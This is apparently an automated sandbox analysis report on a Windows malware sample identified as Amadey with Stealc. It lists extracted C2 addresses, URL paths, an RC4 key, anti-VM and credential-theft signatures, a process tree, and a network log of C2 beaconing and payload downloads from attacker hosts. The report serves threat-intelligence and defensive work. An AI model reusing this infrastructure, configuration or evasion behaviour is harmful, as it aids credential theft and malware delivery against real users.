Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    25/06/2024, 08:50 UTC

General

  • Target

    4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe

  • Size

    1.9MB

  • MD5

    6b9fac405b3c007a076727b08988b8cb

  • SHA1

    2928ea6f1c9f41549246149f17112b6624acbb5c

  • SHA256

    4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f

  • SHA512

    0ce0516e4241430b79547a398ade80f13ef74bebf46c95ce8922ddfff9865dc94b2f9c5de6d476289f450d245e752d8d79887c6320fc474fcb786d2076e43cf5

  • SSDEEP

    49152:pj9QLIKLr59rhb/9ICYwuxJCA4lDhcuzb70D:phQH9ZIC4/DacOb70

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

  • rc4.plain

    1: 006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

default

C2

http://85.28.47.4

Attributes
  • url_path

    /920475a59bac849d.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) [2 TTPs, 7 IoCs]
  • Downloads MZ/PE file
  • Checks BIOS information in registry [2 TTPs, 14 IoCs]

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE [7 IoCs]
  • Identifies Wine through registry keys [2 TTPs, 7 IoCs]

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL [2 IoCs]
  • Reads data files stored by FTP clients [2 TTPs]

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers [2 TTPs]

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting [2 TTPs]
  • Adds Run key to start application [2 TTPs, 1 IoCs]
  • Checks installed software on the system [1 TTPs]

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable [3 IoCs]

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger [9 IoCs]
  • Suspicious use of SetThreadContext [1 IoCs]
  • Drops file in Windows directory [1 IoCs]
  • Enumerates physical storage devices [1 TTPs]

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry [2 TTPs, 2 IoCs]

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry [2 TTPs, 3 IoCs]
  • Modifies data under HKEY_USERS [2 IoCs]
  • Suspicious behavior: EnumeratesProcesses [22 IoCs]
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary [3 IoCs]
  • Suspicious use of AdjustPrivilegeToken [64 IoCs]
  • Suspicious use of FindShellTrayWindow [63 IoCs]
  • Suspicious use of SendNotifyMessage [48 IoCs]
  • Suspicious use of SetWindowsHookEx [1 IoCs]
  • Suspicious use of WriteProcessMemory [64 IoCs]

Processes

  • C:\Users\Admin\AppData\Local\Temp\4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
    "C:\Users\Admin\AppData\Local\Temp\4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3296
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:4024
      • C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe
        "C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2504
      • C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4612
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
          4⤵
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2696
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb30d2ab58,0x7ffb30d2ab68,0x7ffb30d2ab78
            5⤵
            PID:2964
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:2
            5⤵
            PID:1628
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
            5⤵
            PID:3424
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
            5⤵
            PID:1500
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2912 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
            5⤵
            PID:220
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
            5⤵
            PID:4744
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3796 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
            5⤵
            PID:1420
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4348 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
            5⤵
            PID:4628
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4040 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
            5⤵
            PID:1172
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
            5⤵
            PID:4016
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2336 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:2
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4744
      • C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe
        "C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:1904
  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
    1⤵
    PID:3184
  • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3152
  • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1564

                        Network

                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 160
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-ru
                          POST
                          http://147.45.47.155/ku4Nor9/index.php
                          explortu.exe
                          Remote address:
                          147.45.47.155:80
                          Request
                          POST /ku4Nor9/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 147.45.47.155
                          Content-Length: 31
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                        • flag-de
                          GET
                          http://77.91.77.81/cost/sarra.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /cost/sarra.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:14 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2441728
                          Last-Modified: Tue, 25 Jun 2024 08:35:43 GMT
                          Connection: keep-alive
                          ETag: "667a815f-254200"
                          Accept-Ranges: bytes
                        • flag-de
                          GET
                          http://77.91.77.81/cost/random.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /cost/random.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:17 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2476544
                          Last-Modified: Tue, 25 Jun 2024 08:35:06 GMT
                          Connection: keep-alive
                          ETag: "667a813a-25ca00"
                          Accept-Ranges: bytes
                        • flag-de
                          GET
                          http://77.91.77.81/well/random.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /well/random.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:21 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2426880
                          Last-Modified: Tue, 25 Jun 2024 08:37:09 GMT
                          Connection: keep-alive
                          ETag: "667a81b5-250800"
                          Accept-Ranges: bytes
                        • flag-de
                          GET
                          http://77.91.77.81/cost/num.exe
                          explortu.exe
                          Remote address:
                          77.91.77.81:80
                          Request
                          GET /cost/num.exe HTTP/1.1
                          Host: 77.91.77.81
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 25 Jun 2024 08:50:25 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2515968
                          Last-Modified: Mon, 24 Jun 2024 23:38:39 GMT
                          Connection: keep-alive
                          ETag: "667a037f-266400"
                          Accept-Ranges: bytes
                        • flag-us
                          DNS
                          81.77.91.77.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          81.77.91.77.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          8.8.8.8.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          8.8.8.8.in-addr.arpa
                          IN PTR
                          Response
                          8.8.8.8.in-addr.arpa
                          IN PTR
                          dnsgoogle
                        • flag-us
                          DNS
                          www.googleapis.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.googleapis.com
                          IN A
                          Response
                          www.googleapis.com
                          IN A
                          142.250.187.234
                          www.googleapis.com
                          IN A
                          142.250.187.202
                          www.googleapis.com
                          IN A
                          142.250.200.42
                          www.googleapis.com
                          IN A
                          172.217.169.74
                          www.googleapis.com
                          IN A
                          142.250.179.234
                          www.googleapis.com
                          IN A
                          172.217.16.234
                          www.googleapis.com
                          IN A
                          172.217.169.42
                          www.googleapis.com
                          IN A
                          142.250.178.10
                          www.googleapis.com
                          IN A
                          216.58.204.74
                          www.googleapis.com
                          IN A
                          216.58.201.106
                          www.googleapis.com
                          IN A
                          142.250.180.10
                          www.googleapis.com
                          IN A
                          216.58.212.234
                          www.googleapis.com
                          IN A
                          172.217.169.10
                          www.googleapis.com
                          IN A
                          142.250.200.10
                        • flag-us
                          DNS
                          234.187.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          234.187.250.142.in-addr.arpa
                          IN PTR
                          Response
                          234.187.250.142.in-addr.arpa
                          IN PTR
                          lhr25s34-in-f101e100net
                        • flag-us
                          DNS
                          consent.youtube.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          consent.youtube.com
                          IN A
                          Response
                          consent.youtube.com
                          IN A
                          216.58.212.206
                        • flag-us
                          DNS
                          fonts.gstatic.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          fonts.gstatic.com
                          IN A
                          Response
                          fonts.gstatic.com
                          IN A
                          216.58.201.99
                        • flag-us
                          DNS
                          195.212.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          Response
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          lhr25s27-in-f31e100net
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          ams16s21-in-f195�H
                          195.212.58.216.in-addr.arpa
                          IN PTR
                          ams16s21-in-f3�H
                        • flag-us
                          DNS
                          196.187.250.142.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          196.187.250.142.in-addr.arpa
                          IN PTR
                          Response
                          196.187.250.142.in-addr.arpa
                          IN PTR
                          lhr25s33-in-f41e100net
                        • flag-us
                          DNS
                          play.google.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          play.google.com
                          IN A
                          Response
                          play.google.com
                          IN A
                          172.217.169.46
                        • flag-us
                          DNS
                          nexusrules.officeapps.live.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          nexusrules.officeapps.live.com
                          IN A
                          Response
                          nexusrules.officeapps.live.com
                          IN CNAME
                          prod.nexusrules.live.com.akadns.net
                          prod.nexusrules.live.com.akadns.net
                          IN A
                          52.111.236.22
                        • flag-us
                          DNS
                          155.47.45.147.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          155.47.45.147.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          www.youtube.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.youtube.com
                          IN A
                          Response
                          www.youtube.com
                          IN CNAME
                          youtube-ui.l.google.com
                          youtube-ui.l.google.com
                          IN A
                          216.58.204.78
                          youtube-ui.l.google.com
                          IN A
                          216.58.212.238
                          youtube-ui.l.google.com
                          IN A
                          142.250.180.14
                          youtube-ui.l.google.com
                          IN A
                          142.250.178.14
                          youtube-ui.l.google.com
                          IN A
                          142.250.200.14
                          youtube-ui.l.google.com
                          IN A
                          172.217.16.238
                          youtube-ui.l.google.com
                          IN A
                          142.250.200.46
                          youtube-ui.l.google.com
                          IN A
                          216.58.212.206
                          youtube-ui.l.google.com
                          IN A
                          142.250.187.238
                          youtube-ui.l.google.com
                          IN A
                          216.58.201.110
                          youtube-ui.l.google.com
                          IN A
                          172.217.169.46
                          youtube-ui.l.google.com
                          IN A
                          142.250.187.206
                          youtube-ui.l.google.com
                          IN A
                          142.250.179.238
                        • flag-us
                          DNS
                          78.204.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          Response
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f78.1e100.net
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          lhr48s49-in-f14.1e100.net
                          78.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f14.1e100.net
                        • flag-us
                          DNS
                          www.gstatic.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.gstatic.com
                          IN A
                          Response
                          www.gstatic.com
                          IN A
                          216.58.212.195
                        • flag-us
                          DNS
                          www.google.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.google.com
                          IN A
                          Response
                          www.google.com
                          IN A
                          142.250.187.196
                        • flag-us
                          DNS
                          74.204.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          Response
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f74.1e100.net
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          lhr25s13-in-f10.1e100.net
                          74.204.58.216.in-addr.arpa
                          IN PTR
                          lhr48s49-in-f10.1e100.net
                        • flag-us
                          DNS
                          clients2.google.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          clients2.google.com
                          IN A
                          Response
                          clients2.google.com
                          IN CNAME
                          clients.l.google.com
                          clients.l.google.com
                          IN A
                          142.250.187.238
                        • flag-us
                          DNS
                          46.169.217.172.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          46.169.217.172.in-addr.arpa
                          IN PTR
                          Response
                          46.169.217.172.in-addr.arpa
                          IN PTR
                          lhr48s08-in-f14.1e100.net
                        • flag-us
                          DNS
                          22.236.111.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          22.236.111.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-gb
                          GET
                          https://www.youtube.com/account
                          chrome.exe
                          Remote address:
                          216.58.204.78:443
                          Request
                          GET /account HTTP/2.0
                          host: www.youtube.com
                          sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          upgrade-insecure-requests: 1
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          sec-ch-ua-arch: "x86"
                          sec-ch-ua-platform-version: "14.0.0"
                          sec-ch-ua-model: ""
                          sec-ch-ua-bitness: "64"
                          sec-ch-ua-wow64: ?0
                          sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                          x-client-data: CLnrygE=
                          sec-fetch-site: none
                          sec-fetch-mode: navigate
                          sec-fetch-user: ?1
                          sec-fetch-dest: document
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                        • flag-gb
                          GET
                          https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                          chrome.exe
                          Remote address:
                          216.58.212.206:443
                          Request
                          GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                          host: consent.youtube.com
                          upgrade-insecure-requests: 1
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          sec-ch-ua-arch: "x86"
                          sec-ch-ua-platform-version: "14.0.0"
                          sec-ch-ua-model: ""
                          sec-ch-ua-bitness: "64"
                          sec-ch-ua-wow64: ?0
                          sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                          x-client-data: CLnrygE=
                          sec-fetch-site: none
                          sec-fetch-mode: navigate
                          sec-fetch-user: ?1
                          sec-fetch-dest: document
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                          cookie: SOCS=CAAaBgiAkeizBg
                          cookie: YSC=jWjamKsx8YQ
                          cookie: __Secure-YEC=CgtMQVNkdnVCalRhWSjSieqzBjIKCgJHQhIEGgAgZg%3D%3D
                          cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgZg%3D%3D
                        • flag-gb
                          POST
                          https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
                          chrome.exe
                          Remote address:
                          216.58.212.206:443
                          Request
                          POST /_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j HTTP/2.0
                          host: consent.youtube.com
                          content-length: 117
                          sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                          x-same-domain: 1
                          sec-ch-ua-mobile: ?0
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          sec-ch-ua-arch: "x86"
                          content-type: application/x-www-form-urlencoded;charset=UTF-8
                          sec-ch-ua-full-version: "110.0.5481.104"
                          sec-ch-ua-platform-version: "14.0.0"
                          sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                          sec-ch-ua-bitness: "64"
                          sec-ch-ua-model:
                          sec-ch-ua-wow64: ?0
                          sec-ch-ua-platform: "Windows"
                          accept: */*
                          origin: https://consent.youtube.com
                          x-client-data: CLnrygE=
                          sec-fetch-site: same-origin
                          sec-fetch-mode: cors
                          sec-fetch-dest: empty
                          referer: https://consent.youtube.com/
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                          cookie: SOCS=CAAaBgiAkeizBg
                          cookie: YSC=jWjamKsx8YQ
                          cookie: __Secure-YEC=CgtMQVNkdnVCalRhWSjSieqzBjIKCgJHQhIEGgAgZg%3D%3D
                          cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgZg%3D%3D
